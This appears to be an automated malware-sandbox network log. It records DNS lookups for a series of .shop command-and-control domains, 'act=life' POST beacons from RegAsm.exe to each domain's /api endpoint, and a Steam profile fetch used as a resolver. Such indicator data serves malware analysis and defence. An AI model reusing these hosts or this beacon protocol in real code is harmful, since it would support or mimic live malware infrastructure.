                                                                Sep 26, 2024 09:52:06.721266985 CEST1.1.1.1192.168.2.40x73c6Name error (3)lootebarrkeyn.shopnonenoneA (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:06.733890057 CEST1.1.1.1192.168.2.40x8ceaNo error (0)gutterydhowi.shop104.21.4.136A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:06.733890057 CEST1.1.1.1192.168.2.40x8ceaNo error (0)gutterydhowi.shop172.67.132.32A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:07.805356979 CEST1.1.1.1192.168.2.40x68cbNo error (0)ghostreedmnu.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:07.805356979 CEST1.1.1.1192.168.2.40x68cbNo error (0)ghostreedmnu.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:08.786127090 CEST1.1.1.1192.168.2.40xcd28No error (0)offensivedzvju.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:08.786127090 CEST1.1.1.1192.168.2.40xcd28No error (0)offensivedzvju.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:09.699177980 CEST1.1.1.1192.168.2.40xef53No error (0)vozmeatillu.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:09.699177980 CEST1.1.1.1192.168.2.40xef53No error (0)vozmeatillu.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:10.633261919 CEST1.1.1.1192.168.2.40x1c9eNo error (0)drawzhotdog.shop104.21.58.182A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:10.633261919 CEST1.1.1.1192.168.2.40x1c9eNo error (0)drawzhotdog.shop172.67.162.108A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:11.583125114 CEST1.1.1.1192.168.2.40xfd4fNo error (0)fragnantbui.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:11.583125114 CEST1.1.1.1192.168.2.40xfd4fNo error (0)fragnantbui.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:12.528748035 CEST1.1.1.1192.168.2.40xdc89No error (0)stogeneratmns.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:12.528748035 CEST1.1.1.1192.168.2.40xdc89No error (0)stogeneratmns.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:13.482624054 CEST1.1.1.1192.168.2.40xff22No error (0)reinforcenh.shop104.21.77.130A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:13.482624054 CEST1.1.1.1192.168.2.40xff22No error (0)reinforcenh.shop172.67.208.139A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:14.426199913 CEST1.1.1.1192.168.2.40x248bNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:15.908334970 CEST1.1.1.1192.168.2.40x481cNo error (0)performenj.shop172.67.189.2A (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:15.908334970 CEST1.1.1.1192.168.2.40x481cNo error (0)performenj.shop104.21.51.224A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • gutterydhowi.shop
                                                                • ghostreedmnu.shop
                                                                • offensivedzvju.shop
                                                                • vozmeatillu.shop
                                                                • drawzhotdog.shop
                                                                • fragnantbui.shop
                                                                • stogeneratmns.shop
                                                                • reinforcenh.shop
                                                                • steamcommunity.com
                                                                • performenj.shop

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.458440104.21.4.1364436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-09-26 07:52:07 UTC264OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: gutterydhowi.shop
                                                                2024-09-26 07:52:07 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-09-26 07:52:07 UTC772INHTTP/1.1 200 OK
                                                                Date: Thu, 26 Sep 2024 07:52:07 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=hhpj6pbas8olv8ignnjbevr411; expires=Mon, 20 Jan 2025 01:38:46 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uFOA0F2DyOGIww77PiXIGBillS3eG99nIlgUjO6incPOOUbwXEQ4e0OF7z%2BOOSWVkcoH7khPVMtGPhyb5vMDOLhDtCpnD9EXhkr1wNottrxYz1GrrcIgTjtPa6o2QOPkm7%2FQgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8c91ac35ea8d72a4-EWR
                                                                2024-09-26 07:52:07 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                Data Ascii: aerror #D12
                                                                2024-09-26 07:52:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.458441188.114.97.34436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-09-26 07:52:08 UTC264OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: ghostreedmnu.shop
                                                                2024-09-26 07:52:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-09-26 07:52:08 UTC772INHTTP/1.1 200 OK
                                                                Date: Thu, 26 Sep 2024 07:52:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=1pebasua4uouqst65c85n2vusp; expires=Mon, 20 Jan 2025 01:38:47 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYJ7F0YxVOqmkLvk6nfPmPSQTU7mpOXxx53NJ1tbGY620rtk3zvRYG5eOPzBZniXKFjNlc%2BpLb3CsAX4puqDSposZ6yeYyvC86Cvz0mhKzAUfN6UJPdMKIxEPQdbTkETY%2Fe7cg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8c91ac3c19217d0e-EWR
                                                                2024-09-26 07:52:08 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                Data Ascii: aerror #D12
                                                                2024-09-26 07:52:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.458442188.114.96.34436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-09-26 07:52:09 UTC266OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: offensivedzvju.shop
                                                                2024-09-26 07:52:09 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-09-26 07:52:09 UTC770INHTTP/1.1 200 OK
                                                                Date: Thu, 26 Sep 2024 07:52:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=dbu7jp4ns5b94iuqm9rv1970nj; expires=Mon, 20 Jan 2025 01:38:48 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BXm9y8%2FEhplIShUJVJsfKR9fxEh6IEEyaMpdvV2AY7wES7GiBSTRdx3fJugHZLoojMaJwoUl0tvFfl3wiAlvWJWlDVLtY3bT5E%2BKhgmJ%2FKuyNZSvvf3zBWsW4lF9xYgNu4bkOeFA"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8c91ac425dc09e05-EWR
                                                                2024-09-26 07:52:09 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                Data Ascii: aerror #D12
                                                                2024-09-26 07:52:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.458443188.114.96.34436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-09-26 07:52:10 UTC263OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: vozmeatillu.shop
                                                                2024-09-26 07:52:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-09-26 07:52:10 UTC768INHTTP/1.1 200 OK
                                                                Date: Thu, 26 Sep 2024 07:52:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=nknlgn3nesvupmansaks93j5sn; expires=Mon, 20 Jan 2025 01:38:49 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SvDZxHj2fWVFvCxU9oJu9LYfzw9YhRZxB5eofr2MoKmRIKt187ZNZ2YFpygqUeU1sDBI%2Fh9eIgydT0k%2FF7t0hvLlh%2BJGKYtoFSPS2vRFe71aPGU36a4%2FGc9qwygPuoFkGNUr"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8c91ac47ffc4425b-EWR
                                                                2024-09-26 07:52:10 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                Data Ascii: aerror #D12
                                                                2024-09-26 07:52:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.458444104.21.58.1824436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-09-26 07:52:11 UTC263OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: drawzhotdog.shop
                                                                2024-09-26 07:52:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-09-26 07:52:11 UTC766INHTTP/1.1 200 OK
                                                                Date: Thu, 26 Sep 2024 07:52:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=s77kp8v757euoqstdvob4djm2d; expires=Mon, 20 Jan 2025 01:38:50 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1DT5xm03vqTgBG8IP6RZPJQkR3%2BcrEIMiSsZfZoI0U87oKhWR3blvWrIhKOkG9DV3hslPHG8xHhSw99zr0jd2cccC0o1pM3vn7JdY4xiJnJJ%2BrHlsGYhTVj8pJv%2B9rWVoJgQ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8c91ac4dbb397298-EWR
                                                                2024-09-26 07:52:11 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                Data Ascii: aerror #D12
                                                                2024-09-26 07:52:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.458445188.114.97.34436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-09-26 07:52:12 UTC263OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: fragnantbui.shop
                                                                2024-09-26 07:52:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-09-26 07:52:12 UTC762INHTTP/1.1 200 OK
                                                                Date: Thu, 26 Sep 2024 07:52:12 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=0d77jnfq5a9dj0dg0r690q6r9t; expires=Mon, 20 Jan 2025 01:38:51 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wLEPumwRovNQWbKM4COb8MWtydsvrSlKuxJDyu99nC4BRUTJsFAHUSms860V430fJdIIrTqNL7I21dVjN157rhCxxVYZhiuibeBt8FScDER3IXJNBBY%2BhncqHBSofiBjn5eu"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8c91ac53ef0f7298-EWR
                                                                2024-09-26 07:52:12 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                Data Ascii: aerror #D12
                                                                2024-09-26 07:52:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.458446188.114.96.34436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-09-26 07:52:12 UTC265OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: stogeneratmns.shop
                                                                2024-09-26 07:52:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-09-26 07:52:13 UTC772INHTTP/1.1 200 OK
                                                                Date: Thu, 26 Sep 2024 07:52:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=pe4oeqgb4vsuqa9cm9oj1cqou7; expires=Mon, 20 Jan 2025 01:38:52 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A1PI7XtJAmvG4eTv6vuHa4IGAShYpniZKh0whYXUjoXvmcyaLKqN5fTcJMH00pPDXVqkCPc5ny8J4dqxS7GaVK2XdYM1sdw%2BU2Gy9GQ3kr43MO30YOIwnEM%2B2%2FPd4isUVlCVOPk%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8c91ac59cf150c90-EWR
                                                                2024-09-26 07:52:13 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                Data Ascii: aerror #D12
                                                                2024-09-26 07:52:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.458447104.21.77.1304436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-09-26 07:52:13 UTC263OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: reinforcenh.shop
                                                                2024-09-26 07:52:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-09-26 07:52:14 UTC764INHTTP/1.1 200 OK
                                                                Date: Thu, 26 Sep 2024 07:52:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=bvfk96460fne8r39j53ib8h45s; expires=Mon, 20 Jan 2025 01:38:53 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZtroZL2K6tdfzrxLxri8e4t8DSWWkZ1GpPlfNjmzWAzsClroHUPxkEzPp%2B9LarjYCKTJNSmvwe42wCVw4VjIljmUosgFEHzTMUEFky1S4KvhxEI3F272uUhATol%2BmHlRutmj"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8c91ac5f9821185d-EWR
                                                                2024-09-26 07:52:14 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                Data Ascii: aerror #D12
                                                                2024-09-26 07:52:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.458448104.102.49.2544436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-09-26 07:52:15 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                Connection: Keep-Alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Host: steamcommunity.com
                                                                2024-09-26 07:52:15 UTC1870INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                Cache-Control: no-cache
                                                                Date: Thu, 26 Sep 2024 07:52:15 GMT
                                                                Content-Length: 34668
                                                                Connection: close
                                                                Set-Cookie: sessionid=0263ac58a4fa705dceec142c; Path=/; Secure; SameSite=None
                                                                Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                2024-09-26 07:52:15 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                2024-09-26 07:52:15 UTC16384INData Raw: 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75
                                                                Data Ascii: supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu
                                                                2024-09-26 07:52:15 UTC3768INData Raw: 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61
                                                                Data Ascii: w more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div cla
                                                                2024-09-26 07:52:15 UTC2INData Raw: 6c 3e
                                                                Data Ascii: l>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.458449172.67.189.24436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-09-26 07:52:16 UTC262OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: performenj.shop
                                                                2024-09-26 07:52:16 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-09-26 07:52:16 UTC776INHTTP/1.1 200 OK
                                                                Date: Thu, 26 Sep 2024 07:52:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=s1o1p84cec2umj92akvp44qvsm; expires=Mon, 20 Jan 2025 01:38:55 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xHV80Ur5%2F6xoPbSI39%2FPQvopV8XarwfA3KCPTN55fLbX6%2FE9lEl9G66wMuWppRrhA9gEn8x1FTBqTvaTcqAZgamGjz5N0hOR474f%2F3Kq52Cfo%2BzmKsm2lJZbaG%2B%2FNaNghXo%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8c91ac6f0b2f0f4b-EWR
                                                                2024-09-26 07:52:16 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                Data Ascii: aerror #D12
                                                                2024-09-26 07:52:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

